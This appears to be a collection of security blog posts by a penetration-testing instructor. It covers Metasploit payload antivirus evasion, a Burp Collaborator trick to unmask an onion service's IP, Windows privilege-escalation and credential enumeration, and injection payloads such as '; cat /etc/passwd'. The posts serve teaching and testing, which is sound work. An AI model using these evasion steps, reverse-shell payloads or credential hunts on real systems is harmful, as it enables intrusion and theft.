Ghostwriting for Antivirus Evasion in 2018

One of the techniques we cover in the antivirus evasion section of the SANS SEC 504 course is ghost writing. The topic was covered brilliantly by Royce Davis on his blog back in 2012 (

The workflow he laid out still works, but some of the specific commands needed have changed slightly in Kali Linux. One of my students asked if I knew of a resource with the updated commands and I didn’t, so I decided to write it.

The technique aims to take advantage of the fact that sometimes antivirus programs may flag an executable as malicious not because of the program’s functionality, but because the program contains certain signatures that indicate it was created with a “malicious” program such as Metasploit. If this is the case with our payload, then maybe we can make minor modifications which don’t affect the payload’s functionality, but which “break up” or otherwise modify the signatures that are getting it flagged as malware.

Note: For the commands and screenshots shown below I used Kali Linux 2017.2

Step 1: Payload creation

Msfpayload has been deprecated in favor of msfvenom so that’s what we’ll use to generate our payloads. As a baseline, I’ll use msfvenom to make an .exe file and see how it does with virus total.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f exe > straight.exe

The executable produced worked like a champ:

And as expected, when we submit it to, 51/67 flag it as malicious.

With the baseline out of the way, we can get down to business. First we use msfvenom to generate a raw binary instead of an .exe file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f raw > raw_binary

Step 2: Disassemble binary

We then make disassemble.rb executable by running:

chmod +x /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasm-1.0.3/samples/disassemble.rb

We use disassemble.rb to convert our raw binary file to assembly.

/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasm-1.0.3/samples/disassemble.rb raw_binary > asm_code.asm

Step 3a: Modify our assembly

Now that we have an assembly file, we need to make a slight modification so that we can assemble it into a working .exe file later. We can use a text editor like leafpad to add the following two lines to the top of the file.

.section '.text' rwx

At this point that’s the only modification I’m going to do to the assembly file to demonstrate a point.

Step 4: Build the assembly file into an .exe file

We run the following command to make peencode.rb executable.

chmod +x /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasm-1.0.3/samples/peencode.rb

We then use peencode.rb to build our assembly file into an .exe windows executable file.

/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasm-1.0.3/samples/peencode.rb asm_code.asm -o payload.exe

I copied the file to a windows system to test if the payload worked (it did) and then submitted it to

As you can see, while a majority of the antivirus software that virustotal uses still catches this payload, we have gone from 51 to 38 just by assembling the .exe file ourselves instead of using msfvenom to generate it. Even that slight change from what is normally done resulted in over 25% less detections. And we haven’t even started ghostwriting yet!

Step 3b: Ghostwriting

Now that we have that process down, let’s go back to step three and tweak our assembly a bit.

Our goal is to make a change that doesn’t affect the functionality of the program in any way, but still modifies the syntax or structure. One way to accomplish this is to look for any place in the code where a register is XOR’ed with itself.

When a registered is XOR’ed with itself, it’s value becomes zero. If we know that a register is about to be zeroed out, does it matter what it’s value is right before that? Nope!

In the screenshot below, we identify the edi register being XOR’ed with itself. Right before that we insert the following two commands

push edi
pop edi

These commands push the value of the EDI register onto the stack, and then pop it off the stack right back into the edi register. Zero change to the functionality, but now a slightly different signature.

With that change in place, we can build the .exe file from the modified assembly, confirm it works (it does) and upload it to virustotal.

At the risk of sounding like a web banner ad, we just got a 10% reduction in detections from this one small change!! 🙂

The better we understand assembly and the more time we’re willing to spend, we can improve these detection figures quite a bit. In his blog post Royce cites Vivek Ramachandran as the recommended place to learn assembly and I couldn’t agree more. Vivek has a free series of videos available at and some low cost series at

If you want to start working on evading antivirus, this is a great place to start. This  can also be a fun project to use for learning assembly.

Incorporating Facial Recognition into Your OSINT

Between multiple accounts, nicknames and fake names, an individual performing OSINT will often find themselves looking at two pictures and wondering, “Is this the same person?” Sometimes it’s obvious that it is or isn’t the same individual, but it’s not always easy. When uncertainty is high, it would be fantastic to have an unbiased algorithm examine the faces and give a similarity score. I set off to see if I could configure a generic “black box” solution that I could point at a directory of images, and have it tell me which ones were of the same individual.

The first thing I needed to find was a robust facial recognition solution.  I found OpenFace ( which is an open source facial recognition engine developed at Carnegie Mellon.  Its python based and uses several external libraries to detect the face, adjust it for comparison and utilizes deep neural networks for analysis. That’s worth 10 points in buzzword bingo!!

Since there are so many dependencies involved, the OpenFace developers strongly recommend utilizing the docker image that they created. That seemed to fit perfectly with the modular black box end goal I was after so that’s exactly what I did. I downloaded the latest community edition of docker for windows and installed it on a laptop I utilize for OSINT.  Make sure you run the installer as admin and after a logoff and a restart, you should be good to go. You can verify this by opening up an administrative command prompt and typing “docker version”.








I then pulled down the OpenFace image with a docker pull bamos/openface command. Once I had that in place I made a “docker” directory on my c:\ drive and made three sub directories underneath it, group1, group2 & output.






I then modified the docker settings to share the c:\ drive with docker images.  With those in place, it was then time to make a few modifications to the docker image. First, I made some slight changes to the /root/openface/demos/ file. The mods accomplished two things.

  1. Added in a bit of error handling (unmodified it would error and exit if it couldn’t find a face in a picture).
  2. Made the text output easier to parse.

I also added a one line .sh file at /root/ which had OpenFace compare pictures in the c:\docker\group1 and c:\docker\ group2 directories and output the results to the c:\docker\ output directory.

You can either make those same modifications and then commit your changes or I have a copy of my modified version here: If you download my modified version, you can unzip it to a directory and then run docker load -i openfacemod1_v122117 .

Now that we have our modular black box in place, we can test it with a simple python script that compares the images in the group folders and generates a HTML report. NOTE: The requires there to be at least one image in the group2 directory to function properly. I put a picture of Trump in my group2 directory and all the pictures I wanted analyzed in group 1. If you modify the compare script to only use group 1, the output will be unnecessarily long as it will compare images against themselves as well as other images.  

The python script can be viewed at .

The final step is to create a two line batch file that has the docker image analyze the photos, then runs our python script on the results.    

The end result is the raw log.txt files with all the results in the output directory and a HTML report in the docker directory with all photos which had a score beneath 1.0 from the algorithm (identical photos will score 0). I used world famous hacker/social engineer/model Chris Hadnagy for my tests.

While this is a very simplistic example of how we can use facial recognition to help us with our OSINT efforts, the modular nature of the modified docker image gives us the ability to easily incorporate this capability into our web crawlers and scrapers looking for matches.

Using Burp Suite’s Collaborator to Find the True IP Address for a .Onion Hidden Service

On this Thanksgiving day I’m going to write about something near and dear to all our hearts: stuffing. I’m not talking about the delicious pile of bread you’ll have on your plate this afternoon, I’m talking about stuffing payloads into websites to look for vulnerabilities.

We stuff things into web sites all the time. We stuff ‘ or 1-1 ; — and hope for SQL injection, we stuff ; cat /etc/passwd and hope for command injection, we stuff alert(“BEEP!!!”) and hope for cross site scripting and we stuff our credit card number in and hope that this is an authentic Tribble from the 1967 Star Trek episode.

Sometimes we receive instant feedback on our payloads and can confirm a vulnerability in seconds. If I put in ‘ or 1=1; — and bypass a login screen, I can break out my SQL injection dance then and there. The problem comes when you’re injecting your payload somewhere with a delayed response. What if the payload I fire at a website right now doesn’t get executed until an admin is looking at the logs Monday morning? If we want to be able to detect the payload working, we need to set up persistent infrastructure to listen 24 hours a day.

Burp Suite made this MUCH easier when they launched “Burp Collaborator” in 2015. Collaborator, which is included with Burp Suite Professional at no additional cost, is a server set up to listen 24 hours a day, 365 days a year for your payloads to fire back to it.

In the screenshot above, I can click “copy to clipboard” and generate a unique URL that I can utilize in any payload I want.

If anyone or anything looks the URL up or visits it, I will get a notification back in my Burp Suite collaborator client.

This is amazing and unbelievably powerful. We now have the infrastructure in place to generate payloads and listen for them no matter how long of a delay we’re dealing with. As the official Burp Suite twitter feed said earlier this week, if you’re not doing Out-of-band Application Security Testing (OAST), you’re doing it wrong.

Ok, now that we’re all excited about this and see how easy it is, where do you think we should stuff our new payloads? If you excitedly said “EVERYWHERE!!!!”, I like your style and agree with you!!! Fortunately, a brilliant guy named James Kettle agreed with you too and wrote a Burp Suite Professional plugin called “Collaborator Everywhere” earlier this year. The author wrote a fantastic blog post called “Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface” where he introduced the world to his plugin. My friend Kat sent me a link to it during Blackhat and I sat at an outdoor bar in Las Vegas and read it on my phone from start to finish. I’m that much of a nerd and it was that good.

Collaborator Everywhere wants to help us identify back end systems and processes by automatically injecting these collaborator payloads into our web surfing done through Burp Suite. What does it actually do? Check out some of these headers it automatically inserted when I just visited my blog.

Visiting a particular site with that I got a DNS lookup from one of my payload injections:









James did a Blackhat talk you can watch here where he talks about all of the great work he’s done using these techniques. While I was watching the talk, I thought that this technique could potentially be utilized to identify the true IP address of a TOR .onion hidden service.

I fired up my TOR browser bundle and configured Burp Suite to go through TOR. I then surfed to multiple .onion hidden services to see if any of them would give me a collaborator pingback. Finally on about the twentieth site I visited, it worked 🙂

I now had the true IP address for a server associated to an .onion hidden service due to it looking up a header it was fed.

I encourage you to use these techniques on websites which you own or legally have permission to test. They’re easy to use, fun and extremely effective.


11/24/2017 Update:

The tweet I sent out announcing this got quite popular and led to a great sidebar conversation among several people including , and . One of the key points of the thread was that this pingback is from the DNS resolver which may be located very close to the host server, but not necessarily so. The thought was in my head which is why I used the phrase “associated to” instead of “hosting” but it absolutely warrants increased clarity.

Feedback like this is part of what makes the infosec community the amazing place that it is 🙂 My goal was never to publicly out anyone’s .onion service which is why I sanitized all my screenshots but in this case, based on the site’s content, the resolver IP address was inline with what I would expect for a hosting location and I believe it was very close to the host server.

Resources to Help Identify Password Hash Formats

One question that I get asked a lot when I’m teaching the password cracking section in the SANS SEC504 class is “Once I get a password hash, how do I figure out what type of hash it is?” I mention a few resources in class but thought it would be worthwhile to put together a quick write-up to help past and future students after the class.

The first thing I always mention is that you will likely know exactly what type of hash it is based off how you acquired it. If you use meterpreter to dump hashes from a Windows system, grab the hashes from an /etc/shadow file or capture a hash using Responder, you know exactly what type of hash it is based on the method you used to capture it. If you obtained the hash from an encrypted file as I discussed in this blog post on the SANS pen test blog, you know exactly what type of hash it is.

With that out of the way, let’s talk about what to do when you’re not sure what type of hash it is.

Option 1: Have a program identify the hash for you

Some password cracking programs like John the Ripper will try to identify the hashes you ask it to crack for you, but it’s not always right.

Another option is called HashTag and is available here. HashTag is a python program that can look at a single hash or a text file full of hashes and attempt to identify them for you. It will generate a list of the hashes it found and what it thinks they could be.

It appears to detect 269 different hash formats and even includes a handy excel spreadsheet of those formats complete with examples.

Option 2: Check the Wiki that Hashcat maintains for examples

When you’re trying to figure out what a hash it’s, it’s always import to ask yourself what seems likely. If the hashes come from SQL injection attack against a custom web app running on an Apache server, LanMan hashes seem highly unlikely. In that scenario, options like md5 would be much more likely.

If you have an idea of what the hash might be, Hashcat maintains a fantastic wiki of example password hashes for different formats at:

Option 3: Ask for help

Hashcat maintains a fairly active forum at You ARE NOT allowed to post hashes in the forum (doing so is grounds for getting banned), but if you sanitize the hash you can post it, provide what details you can about the source, and ask if anyone has advice on what it is and how to deal with it. I’ve seen veterans go the extra mile on edge cases where things like a custom salt encoding were used.


As I stated in the beginning, we usually have a really good idea of what the format of a hash is. If the hashes come from a custom web app or some other obscure source, we now have a few resources we can check so that we can correctly identify them, and more importantly, start cracking them 🙂


Persistent Monitoring on a Budget

I am a huge fan of Justin Seitz and his blog. Last holiday season he let me know that pastebin was having a sale on it’s API access, and that he was planning on using it in a future project. He came out with that project in April with a post where he used python, the pastebin API and a self hosted search engine called searx to make a keyword persistent monitor which shot out an alert email anytime it found a “hit”.

I was a huge fan of his post and made some modifications to his code in order to fit my needs. I’m much more of a hacker than a coder so I’m sure there are more eloquent ways to achieve what I did, but it’s been meeting my needs for several months, and has had multiple relevant finds. I was recently asked for a copy of my modifications so I thought it easiest to post it on github and write up a description here.

Mod 1: Dealing with spaces in search terms.

Early on I noticed that I would have fantastic results when looking for email addresses hitting pastebin and other sites but was getting quite a few false positives on names. I tested searx and it appeared to respect quotes in searches like google. i.e. searching Matt Edmondson will return pages that contain both “Matt” and “Edmondson”, regardless of if they are together. Searching for “Matt Edmondson” forces them to be adjacent. I made a minor modification to the code in the searx section to check each search term for spaces. If the term contains spaces, it places quotes around the term before searching it in searx. This modification did indeed help reduce false positives on multi-word search terms.






Mod 2: URLs I don’t care about

While my false positives were now lowered, I was still getting results from sites that were valid hits, but that I didn’t care about. I realized that for a lot of these sites, I would likely never care about any hits on them. I made a text file list of “noise URLs” containing entries like . Anytime searx found a new hit, I had it check to see if the url contained anything from my noise URL list. If it didn’t, it proceeded as normal.









If however the searx find was in my noise URL file, the program would print “[+] Fake News!” to the screen and silently write the URL to a fake news text file instead of notifying me via email. This enabled me to reduce my noise while still having a place to go early on and see if I was ignoring anything that I shouldn’t be.







Mod 3: A picture is worth a thousand key words

Now that I was more satisfied with my signal/noise ratio, I decided to make the triage of notification emails more efficient by not just sending me the links to pages that contained my terms, but actually send me a picture of the page as well. This was easy to do, but did come at a cost.

I used PhatomJS to accomplish this task. Whenever the program found a hit in searx or on pastebin, the code would openup a PhantomJS browser, visit the URL, take a screenshot, and save it to a directory so that it could later be attached to my notification emails.

This provided a huge increase in my triaging speed since I didn’t necessarily have to visit the site, just look at a picture. It was also nice a few times when the sites causing my alerts were 3rd party sites which had been hacked and contained malware.

One negative with this was the increase in requirements needed on the system since PhatomJS needs quite a bit more RAM than a normal python script does. If you have this running on a physical system that you control, this is likely a non issue since the specs needed are still modest. If you’re using a provider like digital ocean however, I found that I needed to go from the $5 a month box to the $20 a month box before I achieved the “running for weeks unattended” stability that I desired.

Mod 4: Email Tweaks

The first tweak I made to the email section was an unbelievably minor one to allow for alerts to be sent to multiple email addresses instead of just one. I then had to modify the format of the email slightly to go from a plain text message, to a message with attachments.

As you can see in the code above, I have the send email function attach anything in the ./images subfolder (up to five items) and then delete everything in the folder so it’s clean for the next alert. The reason I limited it to five attachments was that it’s possible to get an email with a dozen or more alerts and if the pages are large, the screenshots will be large as well.

Trying to process a large number sizeable of attachments can cause the program to hang and affect my precious stability. Capping the number of attachments at five seemed like a good compromise since it allowed me to get screenshots 99% of the time and occasionally having to actually go click on a link like a barbarian 🙂

The next time I make mods to this, I’ll likely move all of the images to a cold storage directory which I’ll delete every week with a cron job. That way in those 1% cases where I lack a screenshot, I’ll still have one in the cold storage folder.

Once again, a HUGE hap tip to Justin Seitz. This would absolutely not exist in this form without him. I didn’t even know that searx was a thing until he introduced me to it.

A Script to Help Automate Windows Enumeration for Privilege Escalation

Often when I want to learn a skill, I’ll think up a project for myself that forces me to improve that skill. Recently I wanted to improve my Windows post exploitation and privilege escalation so I decided to work on a script to enumerate Windows systems to look for low hanging fruit that can be used to escalate privileges.

The definitive guide to Windows priv esc is and a good deal of my commands come from that post or resources mentioned in the post. If you’re working on your Windows privilege escalation, you really should spend some time on that page.

I decided to use a batch file instead of PowerShell since batch should run anywhere and is easy for others to understand and modify. The output of the script is saved to three different text files. The script will be a work in progress, but I wanted to post a copy to try to help others automate the process.

First the script gathers basic enumeration information such as:

  • Hostname
  • Whoami
  • Username
  • net user info
  • syseminfo
  • mounted drives
  • path
  • tasklist /SVC

The script checks to see if .msi files are set to always install with elevated privlidges as well as for the presence of backup copies of the SAM for those juicy, juicy password hashes.

If accesschk.exe from sysinternals is present, the script uses it to check for services that can be modified by unprivileged users.

After a quick check for sysprep files which may contain creds, network information is gathered including

  • Ipconfig /all
  • Net use
  • Net share
  • Arp –a
  • Route print
  • Netstat –nao
  • Netsh firewall show state
  • Netsh firewall show config
  • Netsh wlan export profile key=clear (shows wifi networks and passwords that the system has connected to previously)

No privlidge escalation script would be complete without looking at scheduled tasks so we run

  • Schtasks /query /fo /LIST /v
  • Net start
  • driverquery

The script checks for any mention of “password” in the registry and then changes directories to c:\ . The reason for this change is it is getting ready to search the entire file system for files which may have credentials in them.

The results of the scans so far are saved to output.txt and a c:\temp directory is created for output of the next two text files of information.

The script checks for any file that contains “pass”, “cred”, “vnc” or “.config” in the file name. It then checks for a large number of .xml configuration files which may have creds including unattended install files.

The final file that the script creates is a tree list of all the files on the c:\ drive and the script ends by outputting any services which aren’t properly quotes and may be exploitable to the screen.

I recently had a chance to run this script and it GREATLY sped up the process of looking for low hanging fruit on a Windows system and helped me spot a password in the registry.

As I make modifications to the script I’ll post the updates here but you can download a copy of the script at:

Python Script to Map Cell Tower Locations from an Android Device Report in Cellebrite

Recently Ed Michael showed me that Cellebrite now parses cell tower locations from several models of Android phones. He said that this information has been useful a few times but manually finding and mapping the cell tower locations by hand has been a pain in the butt. I figured that it should be easy enough to automate and Anaximander was born.

Anaximander consists of two python 2.7 scripts. One you only need to run once to dump the cell tower location information into a SQLite database and the second script you run each time to generate a Google Earth KML file with all of the cell tower locations on it. As an added bonus, the KML file also respects the timestamps in the file so modern versions of Google Earth will have a time slider bar across the top to let you create animated movies or only view results between a specific start and end time.

Step one is to acquire the cell tower location. For this we go to and sign up for a free API. Once we get the API key (instantly) we can download the latest repository of cell phone towers.


Currently the tower data is around 2.2 GB and contained in a CSV file. Once that file downloads you can unzip it to a directory and run the script from Anaximander. The short and simple script creates a SQLite database named “cellTowers.sqlite” and inserts all of the records into that database. The process should take 3-4 minutes and the resulting database will be around 2.6 GB.

Once the database is populated, the next time you dump an Android device with Cellebrite and it extracts the cell towers from the phone, you’ll be ready to generate a map.

From The “Cell Towers” section of your Cellebrite results, export the results in “XML”. Place that xml file and the file in the same directory as your cellTowers.sqlite database and then run –t <YourCellebriteExport.xml> . The script will start parsing through the XML file to extract cell towers and query the SQLite database for the location of the tower. Due to the size of the database the queries can take a second or two each so the script can take a while to run if the report contains a large number of towers.


Ed was kind enough to provide two reports from different Android devices and both parsed with no issues. Once the script is finished it will let you know how many records it parsed and that it generated a KML file.


This is what the end results look like.


The script can be downloaded from:

This is the first version and there are several improvements to make but I wanted to get a working script out to the community to alleviate the need for examiners to map the towers one at a time. Special thanks again to Ed Michael for the idea for this (and one other) script as well as for providing test data to validate the script.

How to Guide for Getting Kali Linux Set Up on an AWS Instance

I’ve been using a “jump box” on Digital Ocean for a few years now and recently decided that I wanted to set up a Kali Linux instance on AWS. I ran into a few hiccups getting it up and running, so I documented what worked for me here in the hopes of saving others time and headaches.

One of the first articles I came across was by primal security (whose podcast I absolutely LOVE) at . There was some great stuff in this article. Unfortunately it relied on an AWS marketplace Kali Linux image, which is no longer available to new customers.

The next article I found was at . It was very close to what I needed, with a few exceptions, including: the default install for the Debian Jessie instance at the link they provided had a default main partition drive size of only 8GB, which was not enough for a full Kali Linux install. I learned that lesson the hard way when my install failed at the very end.

With a hat tip to the above resources, here are the steps needed to successfully install Kali Linux on AWS.

Go into your AWS console and select, “Launch Instance,” in the upper left hand corner.


Search for and select the Debian Jessie image from the AWS Marketplace.


Here you can select how many vCPUs and RAM you would like. (Admin note: I chose the medium with 2 CPUs and 4 GBs of RAM.) Make sure you hit the, “Next: Configure Instance Details,” so you can add more storage space.

The defaults on most pages should work fine for you, so click Next until get to the, “Step 4: Add Storage,” page. On this page, make sure you change the default size from 8 to at least 20 GBs. (Admin note: I went with 30 GBs.) After an install of Kali Linux Full, the drive will have around 10 GBs on it, so anything over 20 should be good for you.


Once you make that change, you are ready to launch your instance and SSH in. If you’ve never used AWS before, it may take you a few minutes to figure out how to access your box. After the first time, it’s quite easy. Make sure your security groups allow for SSH from your current IP address. The private key you generate should allow you to SSH onto the box – as the user “admin” – using just that key file for authentication.

Click the connect button in your AWS control panel instance window, and you will see some tips on how to access your box, including how to modify the key file for Putty, if you’re a Windows user.

Once you’re logged into the box, run sudo su in order to switch to the root user. Use the passwd command to create a password for root.

Next, add the Kali Linux source repositories. Typing vi /etc/apt/sources.list will let you access the sources.list file where you can then append the following lines onto the end.

deb kali-rolling main contrib non-free
# For source package access, uncomment the following line
# deb-src kali-rolling main contrib non-free

deb sana main non-free contrib
deb sana/updates main contrib non-free
# For source package access, uncomment the following line
# deb-src sana main non-free contrib
# deb-src sana/updates main contrib non-free

deb moto main non-free contrib
# For source package access, uncomment the following line
# deb-src moto main non-free contrib

Admin note: The source for these repositories is from the official kali site at

Once the repositories are in place, run apt-get update && apt-cache search kali-linux to get update information and show all of your Kali Linux install options.

Once that command is complete, you will see a list of about ten different flavors of Kali Linux available, including: minimal, top ten, and full. Of course, you want the full version (which is what you have in a normal Kali Linux VM) so run apt-get install kali-linux-full . This will likely take a while to run, but once it completed (hopefully without errors) you’ll have a working Kali Linux distro in the AWS cloud.

Admin note: There is a very real chance that you could encounter errors in these steps. If this happens, it’s no big deal. Ensure you added the correct lines to the sources.list file and then just rerun the last two apt-get commands. It may take an iteration or two, but it will eventually work and install successfully.

What better way is there to test a newly installed Kali instance than to type msfconsole ?


I tested my new instances connectivity by grabbing the public facing IP from the AWS control panel, opening up port 80 and hitting it from a web browser. That worked, but was boring. What was quite a bit more fun was firing up a Metasploit listener, putting the IP address into a Lan Turtle from Hak5, sticking that in a computer hooked up to a network and within a few seconds receiving a shell.


You now have a fully updated machine running Kali Linux sitting on the internet ready to go anytime you want it, for a total cost of a few dollars a month, as long as you remember to shut it down after you use it!

I can’t wait to collect more shells!

GREM Achievement Unlocked

I had been going through the SANS FOR610 Reverse Engineering Malware content OnDemand recently and last week I knocked out the GREM. I figured it would be a good time to post a few thoughts on it and talk about a few things that people can do to help prep for the course.

This was the first time in a while where I prepped for a GIAC exam without attending the course live. I was a bit worried about that with such a technical course but I ended up having a great experience. This was also the first time one of my courses has had the new style of OnDemand where the course was recorded in a professional studio instead of during a live class. The results were really nice and felt for intimate than I expected.

Every time a lab came up I would pause the course, work through the lab and then watch Lenny Zeltser’s walkthrough afterwards. He did a fantastic job of explaining things and going through the labs step by step. Even with dealing with advanced concepts, I never felt lost.

In a stroke of great timing, when I was about 75% through the course content I got a spear fishing email at work with an attachment. I checked it against and only 4/56 flagged it as malicious and there was no further information. I thought it would be a good chance to put my newly found skills to the test and examine the attachment. I fired up my two VMs and in a short amount of time I had a clear picture on what the malware was doing, had network based and host based IOCs and was walking through the code in a debugger examining how it was unpacking itself. It was great practice and a nice confirmation that what I had learned worked in the real world.

In prepping for the exam I had spoken to several friends who held the GREM certification. One of the biggest things someone can do to help prepare for the course is to get comfortable with assembly language and being able to watch/understand what the stack is doing within a debugger. The course teaches these things but if you’ve already been exposed to them you’ll feel a lot more comfortable and it will allow you to focus on learning other material.

Different people have different learning styles but this is one area where I think it’s really beneficial to watch someone walking through examples while they explain what’s going on. A fantastic free resource for getting exposed to Assembly Language is Vivek Ramachandran’s “Assembly Language Megaprimer for Linux” 11 part video series at ( or on YouTube ( Vivek also has a cheap but not free “x86 Assembly Language and Shellcoding on Linux” series at which really helped me prepare for working on both Reverse Engineering and Exploit Development.

Overall I thought the FOR610 was a fantastic course and I got exactly what I wanted to get out of it.

How Long Do Truecrypt AES Keys Remain In Memory?

It’s been a bit since my last post and in that time I’ve been to two SANS conferences, Blackhat and Defcon. It’s been a great but busy few months.

A few weeks ago I was presenting at a local forensics meeting and was asked by an attendee if AES keys from Truecrypt remained in memory when the Truecrypt volume was dismounted. I replied that I was fairly certain they were flushed from memory when the volume was dismounted but that I hadn’t tested it. It’s a fairly simple thing to test so I made a mental note to test it when I had a chance.

I fired up a laptop running Truecrypt 7.2 on Windows 7. I used the new Magnet Forensics memory acquisition tool and acquired the memory on the laptop. I then mounted a Truecrypt volume on the laptop and then took a second memory image. Finally I dismounted the Truecrypt volume and immediately acquired the memory for a third time.

Obviously the first memory image didn’t have any Truecrypt AES keys since I hadn’t mounted the volume yet.

In the second memory image I used the Volatility “truecryptmaster” command to locate and display the Truecrypt AES key.


Finally for the big test I examined the third memory image which I acquired right after I dismounted the Truecrypt volume.


It appears as though the Truecrypt AES keys are indeed flushed from memory as soon as the volume is dismounted. I wanted to verify my findings using a different tool so I fired up Bulk Extractor and ran it on all three memory images. As you can see in the screenshot below the Truecrypt AES master key shown in the second Volatility examination is seen in the second memory image but not in the first or the third.


This was a quick and simple experiment to verify what we thought was happening was actually happening.